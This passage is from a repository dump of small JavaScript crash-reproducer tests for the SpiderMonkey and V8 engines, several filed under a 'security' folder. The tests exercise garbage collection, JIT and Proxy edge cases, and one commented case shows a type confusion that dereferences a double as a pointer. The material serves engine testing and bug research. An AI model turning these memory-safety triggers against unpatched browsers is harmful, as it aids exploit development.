gcslice(3) 6 | var lfGlobal = newGlobal(); 7 | lfGlobal.offThreadCompileScript(""); 8 | lfGlobal.runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/4a4d91260491f4db1bc718e8a342492e.js: -------------------------------------------------------------------------------- 1 | function foo() { 2 | Object.prototype[2] = 2; 3 | delete Object.prototype[2]; 4 | for (var i = 9; i < 10; i & 1970 & Function ^ (this) ^ (this)) 5 | assertEq([2].concat([3])[0], 2); 6 | } foo(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/534f1144546e9ad46e23ebb53f62299e.js: -------------------------------------------------------------------------------- 1 | function runTestCase(testcase) {} 2 | var lfGlobal = newGlobal(); 3 | for (lfLocal in this) { 4 | if (!(lfLocal in lfGlobal)) { 5 | lfGlobal[lfLocal] = this[lfLocal]; 6 | } 7 | } 8 | lfGlobal.offThreadCompileScript(` 9 | var p = new Proxy({}, {}); 10 | runTestCase.prototype.__proto__ = p; 11 | fullcompartmentchecks(true); 12 | `); 13 | lfGlobal.runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/5a5d00d88b7e0d77a622949b957669ab.js: -------------------------------------------------------------------------------- 1 | Object.defineProperty(Array, Symbol.species, { 2 | value: function() { 3 | return new Proxy(["?"], { 4 | get(t, pk, r) { 5 | return Reflect.get(t, pk, r); 6 | }, 7 | defineProperty(t, pk, desc) { 8 | return true; 9 | } 10 | }); 11 | } 12 | }) 13 | 14 | var r = Intl.Collator("de-u-co-phonebk").compare("x", "X"); 15 | print(r); 16 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/5edade3aa37def405d23661c5110c61d.js: -------------------------------------------------------------------------------- 1 | 2 | g("module 'foo' {}"); 3 | function g(x) { 4 | eval(x, g.escaped); 5 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/5efa5f2166101feb36794f032712da25.js: -------------------------------------------------------------------------------- 1 | gcPreserveCode(); 2 | setJitCompilerOption("ion.warmup.trigger", 20); 3 | DateTimeFormat = newGlobal().Intl.DateTimeFormat; 4 | new DateTimeFormat; 5 | gc(); 6 | new DateTimeFormat; -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/6c01f7461a53d0235071d08e2af7311d.js: -------------------------------------------------------------------------------- 1 | 2 | function testRegexp(res, mode, strings) { 3 | try { 4 | re = new RegExp(res, mode); 5 | for (var i = 0; i < strings.length; ++i) { 6 | var str = strings[i]; 7 | var execResult = re.exec(str); 8 | uneval(execResult); 9 | } 10 | } catch(e) { 11 | } 12 | } 13 | testRegexp("(?:\\3{0}|\\2\\1)+", "i", ["", "", "\x7F\x7F", "", "", "", "", "mmmm_mmmm_", "", ""]); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/6c2d86aba516a9578bb2b96e3a76e621.js: -------------------------------------------------------------------------------- 1 | gczeal(2, 10); 2 | var g = newGlobal(); 3 | var elt = new g.Object; 4 | g.offThreadCompileScript('debugger;', { 5 | element: elt, 6 | }); 7 | var g = newGlobal(); 8 | g.runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/731966186e0e6cf13863edda470d5ac3.js: -------------------------------------------------------------------------------- 1 | evaluate(` 2 | function TestCase() {} 3 | `); 4 | gczeal(15,10); 5 | function f(x) {} 6 | for (var i=0; i<100; i++) { 7 | f(new TestCase()); 8 | } 9 | relazifyFunctions(); 10 | relazifyFunctions(); 11 | for (var i=0; i<10; i-- ) {} -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/7602e5a90086002eaafbf6ecf36cc208.js: -------------------------------------------------------------------------------- 1 | testcase() 2 | function testcase() { 3 | var tokenCodes = {}; 4 | tokenCodes['const'] = 0; 5 | var arr = ['const']; 6 | for (var p in tokenCodes) { 7 | for (var p1 in arr) { 8 | if (arr[p1] === p) { 9 | var p1 = 100 * 1000; 10 | for (var arr = 0; arr != p1; ++arr) {} 11 | } 12 | } 13 | } 14 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/76e0533b28841587e27e40d1e982d1bd.js: -------------------------------------------------------------------------------- 1 | 2 | function m() { 3 | "use asm"; 4 | function f() { 5 | var x = 0; 6 | var y = 0; 7 | y = y[(x + 1) & 3]() | 0; 8 | } 9 | return f; 10 | } 11 | m()(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/7a491bee53e50f9f3b372a9a1bbcff9d.js: -------------------------------------------------------------------------------- 1 | var s = "xxxxxxxx"; 2 | var t = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; // 31 characters 3 | var r1 = t + s; 4 | var r2 = r1 + s; 5 | r2.match(/x/); 6 | r3 = r2 + s; 7 | r3.match(/x/); 8 | parseModule(r2); 9 | dumpStringRepresentation(r1); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/7dee43a951e123cf3743cd8f67dcfaa8.js: -------------------------------------------------------------------------------- 1 | 2 | array1 = new Array(); 3 | size = 10; 4 | for (i = 0; i < size; (array1.length)++) 5 | { 6 | array1.push(array1.shift()); 7 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/857ffa6b37c97e060ed2bfd0c4d20b66.js: -------------------------------------------------------------------------------- 1 | 2 | var lfcode = new Array(); 3 | lfcode.push(""); 4 | lfcode.push(""); 5 | lfcode.push("1"); 6 | lfcode.push(""); 7 | lfcode.push(""); 8 | lfcode.push(""); 9 | lfcode.push(""); 10 | lfcode.push("2"); 11 | lfcode.push("gczeal(4);"); 12 | lfcode.push("setObjectMetadataCallback(function(obj) {});"); 13 | while (true) { 14 | var file = lfcode.shift(); if (file == undefined) { break; } 15 | loadFile(file) 16 | } 17 | function loadFile(lfVarx) { 18 | try { 19 | if (lfVarx.substr(-3) != ".js" && lfVarx.length != 1) { 20 | switch (lfRunTypeId) { 21 | case 2: new Function(lfVarx)(); break; 22 | } 23 | } else if (!isNaN(lfVarx)) { 24 | lfRunTypeId = parseInt(lfVarx); 25 | } 26 | } catch (lfVare) { 27 | } 28 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/89a95ef2cab38c4cbce7e58cb291c9d5.js: -------------------------------------------------------------------------------- 1 | var wrapper = evaluate("({a: 15, b: {c: 42}})", { 2 | global: newGlobal({}) 3 | }); 4 | nukeCCW(wrapper); 5 | gczeal(8, 1); 6 | switch (lfRunTypeId) {} -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/8ebd8e30c53d646638000da1ed745294.js: -------------------------------------------------------------------------------- 1 | 2 | function testForVarInWith(foo, foo) { 3 | return eval("with ({}) { for (var x = 0; x < 5; x++); } (function() { return delete x; })"); 4 | } 5 | f = testForVarInWith()(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/952ecce60cecc66103301ceae02695d8.js: -------------------------------------------------------------------------------- 1 | 2 | test(); 3 | function test() { 4 | function v() { 5 | try { 6 | test(/x{2147483647,2147483648}x/.test('1'), false); 7 | } catch (actual) {} 8 | } 9 | v(); 10 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/986ea973c6cd10e3419b69e081ae801f.js: -------------------------------------------------------------------------------- 1 | const dbg = new Debugger(); 2 | const g = evalcx("lazy"); 3 | dbg.addDebuggee(g); 4 | dbg.memory.trackingAllocationSites = true; 5 | g.eval("this.alloc = {}"); 6 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/9f56a24c393c62b942bdd66b9aa75a21.js: -------------------------------------------------------------------------------- 1 | function a() 2 | { 3 | gc(); 4 | } 5 | 6 | function test() 7 | { 8 | var obj = { get __noSuchMethod__() { 9 | return new Object(); 10 | }}; 11 | 12 | obj.x(a()); 13 | } 14 | test(); 15 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/a15686d5f5c042728a31a1c9eab76e28.js: -------------------------------------------------------------------------------- 1 | var lfLogBuffer = ` 2 | //corefuzz-dcd-endofdata 3 | //corefuzz-dcd-endofdata 4 | //corefuzz-dcd-endofdata 5 | setJitCompilerOption("ion.warmup.trigger", 4); 6 | var g = newGlobal(); 7 | g.debuggeeGlobal = this; 8 | g.eval("(" + function () { 9 | dbg = new Debugger(debuggeeGlobal); 10 | dbg.onExceptionUnwind = function (frame, exc) { 11 | var s = '!'; 12 | for (var f = frame; f; f = f.older) 13 | debuggeeGlobal.log += s; 14 | }; 15 | } + ")();"); 16 | j('Number.prototype.toSource.call([])'); 17 | //corefuzz-dcd-endofdata 18 | //corefuzz-dcd-endofdata 19 | //corefuzz-dcd-endofdata 20 | //corefuzz-dcd-selectmode 4 21 | //corefuzz-dcd-endofdata 22 | } 23 | //corefuzz-dcd-endofdata 24 | //corefuzz-dcd-selectmode 5 25 | //corefuzz-dcd-endofdata 26 | oomTest(() => i({ 27 | new : (true ), 28 | thisprops: true 29 | })); 30 | `; 31 | lfLogBuffer = lfLogBuffer.split('\n'); 32 | var lfRunTypeId = -1; 33 | var lfCodeBuffer = ""; 34 | while (true) { 35 | var line = lfLogBuffer.shift(); 36 | if (line == null) { 37 | break; 38 | } else if (line == "//corefuzz-dcd-endofdata") { 39 | loadFile(lfCodeBuffer); 40 | lfCodeBuffer = ""; 41 | loadFile(line); 42 | } else { 43 | lfCodeBuffer += line + "\n"; 44 | } 45 | } 46 | if (lfCodeBuffer) loadFile(lfCodeBuffer); 47 | function loadFile(lfVarx) { 48 | try { 49 | if (lfVarx.indexOf("//corefuzz-dcd-selectmode ") === 0) { 50 | lfRunTypeId = parseInt(lfVarx.split(" ")[1]) % 6; 51 | } else { 52 | switch (lfRunTypeId) { 53 | case 4: 54 | oomTest(function() { 55 | let m = parseModule(lfVarx); 56 | }); 57 | break; 58 | default: 59 | evaluate(lfVarx); 60 | } 61 | } 62 | } catch (lfVare) {} 63 | } 64 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/a3fd00ef0d42ee50afe4cde0b69ac00e.js: -------------------------------------------------------------------------------- 1 | setJitCompilerOption("ion.warmup.trigger", 20); 2 | loadFile(` 3 | function test(obj) { 4 | var it = Array.prototype[Symbol.iterator].call(obj); 5 | for (var i = 0; i < (obj.length >>> 0); i++) 6 | unescape(it, obj[i]); 7 | } 8 | test({}); 9 | test({}); 10 | test({ length: 2, }); 11 | test(Object.create(['x', 'y', 'z'])); 12 | test(Object.create({ length: 2, 1: 'y'})); 13 | test(""); 14 | test("ponies"); 15 | `); 16 | function loadFile(lfVarx) { 17 | function newFunc(x) { 18 | new Function(x)(); 19 | }; 20 | newFunc(lfVarx); 21 | var lfGlobal = newGlobal(); 22 | lfGlobal.offThreadCompileScript(lfVarx); 23 | lfGlobal.runOffThreadScript(); 24 | evaluate(lfVarx, {}); 25 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/ab945d25510d1ae600a8e7319af9568b.js: -------------------------------------------------------------------------------- 1 | 2 | a = evalcx(''); 3 | for (var i = 0; i < 1000; i++) { 4 | a[i] = i; 5 | } 6 | function foo(x) { 7 | for (var i in x) 8 | var summary = "Basic support for iterable objects and for-in"; 9 | } 10 | schedulegc(1234); 11 | foo(a); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/b1032cd1239cb2866406c21d27086e9b.js: -------------------------------------------------------------------------------- 1 | new (function(){print(arguments.length)}.bind(null, ...Array(300000).fill(0)))(...Array(200000+1).fill(0)) 2 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/bdb494099f2ebaf790db3eeb962e4bf1.js: -------------------------------------------------------------------------------- 1 | var a = []; 2 | for (var i = 0; i < 200; ++i) a.push({}); 3 | var p = Proxy.create({fix: function() { return a; }}); 4 | Object.preventExtensions(p); 5 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/c35ea168b468e447a397fa69719dd4d3.js: -------------------------------------------------------------------------------- 1 | var w = new WeakMap(); 2 | var g = newGlobal(); 3 | var k = g.eval('for (var i=0;i<100000;i++) new Object(); var q = new Object(); dumpObject(q); q'); 4 | dumpObject(k); 5 | w.set(k, {}); 6 | k = null; 7 | 8 | print('first gc...'); 9 | gc(); 10 | gc(); 11 | g.eval('q = null'); 12 | print('comp gc'); 13 | gc(g); 14 | gc(g); 15 | gc(g); 16 | gc(g); 17 | gc(g); 18 | gc(g); 19 | print('last gc'); 20 | gc(); 21 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/cda6288cf9ced00b390da463ff25886f.js: -------------------------------------------------------------------------------- 1 | var tz = new Intl.DateTimeFormat(undefined, {timeZone: "America/Indianapolis"}).resolvedOptions().timeZone; 2 | var tz2 = newGlobal().eval(` 3 | new Intl.DateTimeFormat(undefined, {timeZone: "America/Indianapolis"}).resolvedOptions().timeZone; 4 | `); 5 | print(tz===tz2); 6 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/d338ac6c2b3254c3ebf387230fb2396b.js: -------------------------------------------------------------------------------- 1 | var a = new Uint8Array(); 2 | a.subarray(); 3 | gcslice(0); 4 | gcslice(1781); 5 | neuter(a.buffer); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/d42ce677cdb354a90625a4abd1d34741.js: -------------------------------------------------------------------------------- 1 | Object.prototype[Symbol.replace] = Array; 2 | Intl.DateTimeFormat("arSA-u-ca-islamic-civilnu-latn").format; -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/d6c9b1100a507466ea01b3e57fa364bf.js: -------------------------------------------------------------------------------- 1 | 2 | var lfcode = new Array(); 3 | lfcode.push(""); 4 | lfcode.push(""); 5 | lfcode.push(""); 6 | lfcode.push("x = function () { return arr.length; }"); 7 | lfcode.push(""); 8 | lfcode.push(""); 9 | lfcode.push("enableSPSProfiling();"); 10 | lfcode.push(""); 11 | lfcode.push("\ 12 | x >>= /x/;\ 13 | (function f() {\ 14 | x.r = x;\ 15 | return f()\ 16 | })();\ 17 | "); 18 | for (lfx in lfcode) { loadFile(lfcode[lfx]); } 19 | function loadFile(lfVarx) { 20 | try { 21 | evaluate(lfVarx, { noScriptRval : true, compileAndGo : true }); 22 | } catch (lfVare) {} 23 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/da56c8ffa1728b41e3e69f45baccfc5a.js: -------------------------------------------------------------------------------- 1 | var lfOffThreadGlobal = newGlobal(); 2 | enableShellAllocationMetadataBuilder() 3 | lfOffThreadGlobal.offThreadCompileScript(` 4 | gczeal(8, 1) 5 | function recurse(x) { 6 | recurse(x + 1); 7 | }; 8 | recurse(0); 9 | `); 10 | lfOffThreadGlobal.runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/dcc0b4d4894e1e58a58a94629727ea99.js: -------------------------------------------------------------------------------- 1 | 2 | var g1 = newGlobal('new-compartment'); 3 | schedulegc(g1); 4 | gcslice(0); 5 | function testEq(b) { 6 | var a = deserialize(serialize(b)); 7 | } 8 | testEq(Array(1024).join(Array(1024).join((false)))); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/df53d00a2726563b16eea12fc7d2e683.js: -------------------------------------------------------------------------------- 1 | STATUS = "STATUS " 2 | function printStatus(msg) { 3 | lines = msg.split(); 4 | print(STATUS + lines[0]); 5 | } 6 | Object.defineProperty(Object.prototype, 'e', {}); 7 | Object.prototype.apply = summary = 'GC without recursion'; 8 | Object.prototype[0] = /a/ 9 | printStatus(summary); 10 | oomAfterAllocations(10); 11 | printStatus(summary)({}.__proto__.watch('x', print)); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/e3605f03fcecccb85bf8995ccf3afe7d.js: -------------------------------------------------------------------------------- 1 | gczeal(4) 2 | evalInWorker(` 3 | gczeal(2,1)(/s/); 4 | `) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/e86441456ad36d4d139496d8dda9cf25.js: -------------------------------------------------------------------------------- 1 | for (lfLocal in this) {} 2 | function foo() { 3 | var T = TypedObject; 4 | var ObjectStruct = new T.StructType({ 5 | f: T.Object 6 | }); 7 | var o = new ObjectStruct(); 8 | function writeObject(o, v, expected) { 9 | o.f = v; 10 | } 11 | for (var i = 0; i < 5; i++) 12 | writeObject(o, {}, "helo"); 13 | for (var i = 0; i < 5; i++) 14 | writeObject(o, null, "null"); 15 | writeObject(o, "three", "three"); 16 | for (var i = 0; oomAfterAllocations(1); i++) 17 | writeObject(o, 4.5, "4.5"); 18 | writeObject(o, undefined, ""); 19 | for (var i = 0; 20 | (class get {}.get++) < 5; i++) 21 | writeString(s, 4.5, "4.5");var lfcode = new Array(); 22 | } foo(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/e95e5239e1f2f206518430bca12589ef.js: -------------------------------------------------------------------------------- 1 | String.prototype[Symbol.split] = function(s, limit) { return [""]; }; 2 | Intl.DateTimeFormat("de", {}).format() 3 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/e9d7b74546c8883347f456ce848ec0ee.js: -------------------------------------------------------------------------------- 1 | class C { 2 | } 3 | class D extends C { 4 | constructor() { 5 | var a=(for (x of []) 1); 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/eb5c1e4020c86d95be2dd1f35ca70dcc.js: -------------------------------------------------------------------------------- 1 | "xy".match(/((x)??){2}y/) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/ebe297ba96d5b1c84a59c2379979b514.js: -------------------------------------------------------------------------------- 1 | 2 | var obj = {}; 3 | obj.watch(QName(), function () {}); 4 | gc(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/eca12c4af8898ad6543b7c9fad2148eb.js: -------------------------------------------------------------------------------- 1 | 2 | gcPreserveCode(); 3 | function assertEq(setter) {} 4 | function raisesException(exception) { 5 | try { } catch (actual) { }; 6 | if (typeof a == 'object') { 7 | for (var prop in a) { } 8 | } 9 | } 10 | function build_getter(i) { 11 | var x = [ 1 ] ; 12 | return function f() { return x; } 13 | } 14 | function test() { 15 | var N = internalConst("INCREMENTAL_MARK_STACK_BASE_CAPACITY") + 2; 16 | var o = {}; 17 | var descriptor = { enumerable: true}; 18 | for (var i = (0); i != N; ++i) { 19 | descriptor.get = build_getter(i); 20 | Object.defineProperty(o, i, descriptor); 21 | } 22 | for (var i = 0; i != raisesException; ++i) 23 | assertEq(o[i][0], i); 24 | } 25 | evaluate("test();"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/fbdd8176b157b85d779a3e1f14991e64.js: -------------------------------------------------------------------------------- 1 | r = evalcx("/x/", undefined); 2 | s = ""; 3 | gc() 4 | Function("\ 5 | s.match(r);\ 6 | schedulegc(__proto__);\ 7 | ({c:schedulegc(2)});\ 8 | s.match(r);\ 9 | ")() -------------------------------------------------------------------------------- /js_tests/V8/non-security/0e6c7c74434af21977eb556962d793b5.js: -------------------------------------------------------------------------------- 1 | function force_deopt() { 2 | try { 3 | undefined[{}] = /[abc]/gi; 4 | } catch(e) {} 5 | } 6 | 7 | force_deopt(); 8 | force_deopt(); 9 | %OptimizeFunctionOnNextCall(force_deopt); 10 | force_deopt(); 11 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/13499669cc36cb4f8bcddeaa8cff0202.js: -------------------------------------------------------------------------------- 1 | function asm() { 2 | 'use asm'; 3 | function f() {} 4 | return f; 5 | } 6 | for (var i = 0; i < 50000; ++i) { 7 | asm(); 8 | } 9 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/13cb49ec84640fb1ad7db2d46ef2fdb4.js: -------------------------------------------------------------------------------- 1 | function f(test, a) { 2 | var v; 3 | if (test) { 4 | v = v|0; 5 | } 6 | a[v] = 1; 7 | } 8 | var v = new String(); 9 | f(false, v); 10 | f(false, v); 11 | 12 | v = new Int32Array(10); 13 | f(true, v); 14 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/15411e7b82229573f3ab22bfc84a42a4.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | "use strict"; 3 | try { 4 | for (let i = 0; i < 10; i++) {} 5 | } catch(e) {} 6 | } 7 | %OptimizeFunctionOnNextCall(f); 8 | f(); 9 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/1d50f04a91a926664e3f0cf9dfafccc7.js: -------------------------------------------------------------------------------- 1 | // Make the Object prototype have dictionary properties. 2 | for (var i = 0; i < 2000; i++) { 3 | Object.prototype['generatedProperty'+i] = true; 4 | } 5 | 6 | function boom(a1) { 7 | with ({}) {} // Force Turbofan. 8 | return a1[0]; 9 | } 10 | 11 | var a = new Array(1); 12 | a[0] = 0.1; 13 | boom(a); 14 | boom(a); 15 | %OptimizeFunctionOnNextCall(boom); 16 | boom(a); 17 | 18 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/1f1e59baccd8c16fb3935c6c357d26de.js: -------------------------------------------------------------------------------- 1 | var y = new Date("-1073741824"); 2 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/1fe3a69891b40a8d6a2cac2cb6c4058b.js: -------------------------------------------------------------------------------- 1 | function replace(string) { 2 | return string.replace(/L/g, "\ud800") 3 | .replace(/l/g, "\ud801") 4 | .replace(/T/g, "\udc00") 5 | .replace(/\./g, ("Empty array []")); 6 | } 7 | function test(regexp_source, subject) { 8 | subject = replace(subject); 9 | regexp_source = replace(regexp_source); 10 | new RegExp(regexp_source, "u").exec(subject); 11 | } 12 | test("(L).*\\1(.)", "LLTLl"); 13 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/23bad2ab14166793d7f11ba88764e2d6.js: -------------------------------------------------------------------------------- 1 | function g() { 2 | g.arguments; 3 | } 4 | function f() { 5 | [0].forEach(g); 6 | } 7 | f(); 8 | f(); 9 | %OptimizeFunctionOnNextCall(f); 10 | f(); 11 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/2a2d66706551744505fab1d33875a512.js: -------------------------------------------------------------------------------- 1 | __v_5 = eval; 2 | function __f_0(size) { 3 | var __v_0 = "function f(x) {" + 4 | " if (x > 0) return ["; 5 | for (var __v_3 = 0; __v_3 < size; __v_3++) { 6 | __v_0 += "0.1, "; 7 | } 8 | __v_0 += " ];" + 9 | "}"; 10 | __v_5(__v_0); 11 | } 12 | __v_4 = 65535; 13 | __f_0(__v_4); 14 | f(1); 15 | f(1); 16 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/2be1a68565c62898d3cae21f31dacd14.js: -------------------------------------------------------------------------------- 1 | function __f_6(expectation, regexp, subject) { 2 | regexp.exec(subject); 3 | } 4 | function __f_7(expectation, regexp_source, subject) { 5 | __f_6(expectation, new RegExp(regexp_source, "u"), subject); 6 | } 7 | __f_7(null, "[^\u{1}-\u{65535}]", "\u{12358}"); 8 | 9 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/2db0f3303ab19e02a05cf0f6aafd4cd4.js: -------------------------------------------------------------------------------- 1 | RangeError.prototype.__defineGetter__("name", function() { 2 | return 2147483647; 3 | }) 4 | v40 = new RangeError(); 5 | v65 = new ArrayBuffer(v40); 6 | v78 = v65.slice(); 7 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/336dd61b23e272e4bfc9d1e6efab503a.js: -------------------------------------------------------------------------------- 1 | class Base {} 2 | class Subclass extends Base { 3 | constructor() { 4 | %DeoptimizeNow(); 5 | super(); 6 | } 7 | } 8 | new Subclass(); 9 | new Subclass(); 10 | %OptimizeFunctionOnNextCall(Subclass); 11 | new Subclass(); 12 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/4a62f02e1903453be714ab56f9ea439a.js: -------------------------------------------------------------------------------- 1 | // Copyright 2014 the V8 project authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style license that can be 3 | // found in the LICENSE file. 4 | 5 | // Flags: --allow-natives-syntax 6 | 7 | function foo() {} 8 | foo(); 9 | %OptimizeFunctionOnNextCall(foo); 10 | foo(); 11 | %NeverOptimizeFunction(foo); 12 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/4cbfd82314fec2fef5f16578baa6e510.js: -------------------------------------------------------------------------------- 1 | function __f_3(a, b, c) { 2 | this.b = b; 3 | this.c = c; 4 | } 5 | __v_2 = new __f_3(1, 2, 3.5); 6 | __v_1 = new __f_3(1, 2.5, 3); 7 | function __f_2(o) { 8 | o.d = 1; 9 | } 10 | __f_2(__v_2); 11 | (function __f_5() { 12 | Object.assign(__v_1, __v_1); 13 | })(); 14 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/5227874330c0483ba14fd6879cd83924.js: -------------------------------------------------------------------------------- 1 | v1 = 2147483647; 2 | var v6 = {}; 3 | v9 = new Uint8ClampedArray(v1); 4 | v11 = new Intl.DateTimeFormat(v6, v9); 5 | v21 = JSON.stringify(v9); 6 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/59e3edfeb6c86858259666cc083ff68a.js: -------------------------------------------------------------------------------- 1 | var buffer = new ArrayBuffer(0xc0000000); 2 | //assertEquals(0xc0000000, buffer.byteLength); 3 | buffer.byteLength; 4 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/6e1265cffb0bec85b77f4752a292e2e8.js: -------------------------------------------------------------------------------- 1 | f = (e=({} = {} = 1)) => {} 2 | f(1); 3 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/7f26245f11f2272455878c0b8d08bad5.js: -------------------------------------------------------------------------------- 1 | function x(t,n){for(;n.length;)for(;n.length;)try{t()}catch(a){}}!function(){a='m0=(function(){"use asm";function f(){}return f}())';c="m4=(function(x){(m0()?(!0/0):x)>>0})";e="m5=(function(y){m4(y)});x(m5,[0])";try{eval(a)}catch(x){}Function,Function(c)();try{eval(e)}catch(x){}}() 2 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/83f06b51233bbbf8be5f3b26124beb23.js: -------------------------------------------------------------------------------- 1 | [(...[a+b]) => 42); 2 | 3 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/8a82d6a740d34f2d01e44a2729dcc75c.js: -------------------------------------------------------------------------------- 1 | new Intl.DateTimeFormat("en-u-ca-chinese", { year: "numeric" }).formatToParts() 2 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/8bd9587c93ec24348ebfe706100a917c.js: -------------------------------------------------------------------------------- 1 | %Foo(...spread); 2 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/8d1d4d96a8a81c7fcc581619de5c259f.js: -------------------------------------------------------------------------------- 1 | "use strict"; 2 | for (var __v_1 = 0; __v_1 < 1000000; __v_1++); 3 | try { 4 | try { 5 | eval('--'); 6 | } catch (e) { 7 | } 8 | } catch(e) {; } 9 | try { 10 | function get() { return x; } 11 | __v_7 = {x: 1}; 12 | } catch(e) {"Caught: " + e; } 13 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/98670f07471ba0d4bd3d8a0a8b369de7.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | var o = { get[g()]() {} }; 3 | return o; 4 | } 5 | function g() { 6 | var str = ""; 7 | for (var i = 0; i < 24; i++) { 8 | str += "abcdefgh12345678" + str; 9 | } 10 | return str; 11 | } 12 | f(); 13 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/a17b685d5f84eaf0493c831aa68104c7.js: -------------------------------------------------------------------------------- 1 | // Copyright 2014 the V8 project authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style license that can be 3 | // found in the LICENSE file. 4 | 5 | // Flags: --expose-gc 6 | a = []; 7 | a[1000] = .1; 8 | a.length = 0; 9 | gc(); 10 | gc(); 11 | a[1000] = .1; 12 | //assertEquals(.1, a[1000]); 13 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/a5901f10f6a8bc3e8477f762293da01a.js: -------------------------------------------------------------------------------- 1 | // Create elements in a constructor function to ensure map sharing. 2 | function TestConstructor() { 3 | this[0] = 1; 4 | this[1] = 2; 5 | this[2] = 3; 6 | } 7 | function bad_func(o,a) { 8 | var s = 0; 9 | for (var i = 0; i < 1; ++i) { 10 | o.newFileToChangeMap = undefined; 11 | var x = a[0]; 12 | s += x; 13 | } 14 | return s; 15 | } 16 | o = new Object(); 17 | a = new TestConstructor(); 18 | bad_func(o, a); 19 | // Make sure that we're out of pre-monomorphic state for the member add of 20 | // 'newFileToChangeMap' which causes a map transition. 21 | o = new Object(); 22 | a = new TestConstructor(); 23 | bad_func(o, a); 24 | // Optimize, before the fix, the element load and subsequent tagged-to-i were 25 | // hoisted above the map check, which can't be hoisted due to the map-changing 26 | // store. 27 | o = new Object(); 28 | a = new TestConstructor(); 29 | %OptimizeFunctionOnNextCall(bad_func); 30 | bad_func(o, a); 31 | // Pass in a array of doubles. Before the fix, the optimized load and 32 | // tagged-to-i will treat part of a double value as a pointer and de-ref it 33 | // before the map check was executed that should have deopt. 34 | o = new Object(); 35 | // Pass in an elements buffer where the bit representation of the double numbers 36 | // are two adjacent small 32-bit values with the lowest bit set to one, causing 37 | // tagged-to-i to SIGSEGV. 38 | a = [2.122e-314, 2.122e-314, 2.122e-314]; 39 | bad_func(o, a); 40 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/b39caa805623f92949977131877b711f.js: -------------------------------------------------------------------------------- 1 | function setx() { 2 | setx(typeof new Uint16Array('x') === 'object'); 3 | } 4 | var exception = false; 5 | try { 6 | setx(); 7 | } catch (ex) { 8 | // assertTrue(ex instanceof RangeError); 9 | ex instanceof RangeError; 10 | exception = true; 11 | } 12 | //assertTrue(exception); 13 | exception; 14 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/b8f3fc60d4acc46a2e5f8bfa9608a3d7.js: -------------------------------------------------------------------------------- 1 | var z = {valueOf: function() { return 3; }}; 2 | 3 | 4 | function f() { 5 | var y = -2; 6 | return (1 & z) - y++; 7 | } 8 | 9 | //assertEquals(3, f()); 10 | //assertEquals(3, f()); 11 | f(); 12 | f(); 13 | %OptimizeFunctionOnNextCall(f); 14 | //assertEquals(3, f()); 15 | f(); 16 | 17 | function g() { 18 